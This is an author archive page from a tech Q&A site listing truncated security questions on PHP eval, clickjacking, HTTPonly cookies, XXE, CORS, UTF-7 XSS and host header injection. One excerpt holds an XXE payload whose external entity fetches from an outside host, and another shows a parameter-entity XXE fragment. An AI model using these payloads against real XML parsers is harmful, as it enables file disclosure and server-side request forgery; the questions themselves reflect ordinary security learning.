WindowsTechs.com

Author Archives: Utkarsh Agrawal

How eval() in php can be dangerous in web application’s security?

Posted on February 8, 2018 by Utkarsh Agrawal

I want to know how the eval function can be dangerous for any web application’s security.

Below is the code I use to understand how an attacker can exploit it when any user input is passed to the eval function.

<?ph… Continue reading How eval() in php can be dangerous in web application’s security?→

Posted in PHP

How to steal source code through clickjacking?

Posted on January 28, 2018 by Utkarsh Agrawal

Is it possible to steal the source code through clickjacking, so that an attacker can also steal the CSRF tokens?

This is a demo attack website:

<!DOCTYPE html>
<html>

</div>
<div draggable="true" ondrags… Continue reading How to steal source code through clickjacking?→

Posted in clickjacking

HTTPonly cookies are secure enough?

Posted on December 1, 2017 by Utkarsh Agrawal

I have a website which has a “remember me” functionality. And when someone clicks that functionality it sets the user password and username in the cookie to remember him/her. Okay, fine.

But, that cookie is on the HTTPonly … Continue reading HTTPonly cookies are secure enough?→

Posted in cookies

How to use Docker? [on hold]

Posted on September 24, 2017 by Utkarsh Agrawal

Hello, I recently installed Docker for an XXE CTF, but I don’t know how to start. I also read the README file to get started and I followed all those steps but didn’t succeed.

I am now sharing what I did and what I got (on Windows).

… Continue reading How to use Docker? [on hold]→

Posted in Docker, Windows, xxe

What are parameter entities in XML?

Posted on September 22, 2017 by Utkarsh Agrawal

What are parameter entities? How do parameter entities work?

I have an example; please let me know how this works.

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE r
[<!ENTITY % name '<!ENTITY utkarsh SYSTEM "http… Continue reading What are parameter entities in XML?→

Posted in web-application, xxe

XXE exploitation [on hold]

Posted on September 21, 2017 by Utkarsh Agrawal

How does an XML parser work? When we submit our payload like the following:

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

… Continue reading XXE exploitation [on hold]→

Posted in web-application, XML, xxe

Why do we use CORS?

Posted on September 19, 2017 by Utkarsh Agrawal

I am confused about why websites use CORS. I know CORS provides some protocols through which a website can call resources from other domains, but is it possible to call the resource without CORS?

If it is, then what vulnerability can it … Continue reading Why do we use CORS?→

Posted in CORS, web-application

How to define the UTF-7 in firefox? [on hold]

Posted on August 28, 2017 by Utkarsh Agrawal

I want to define UTF-7 in Firefox to execute the UTF-7 XSS payload.

So, how can I change it?

Is it related to the content-type header?

Continue reading How to define the UTF-7 in firefox? [on hold]→

Posted in Firefox, web browser, web-application, xss

Host header injection

Posted on August 4, 2017 by Utkarsh Agrawal

I am a little bit confused: if the website is using a CSRF token in the body of the request, then “Is host header injection possible?” just by manipulating the host header value.

So can anyone clarify this for me?

Thank… Continue reading Host header injection→

Posted in CSRF, web-application
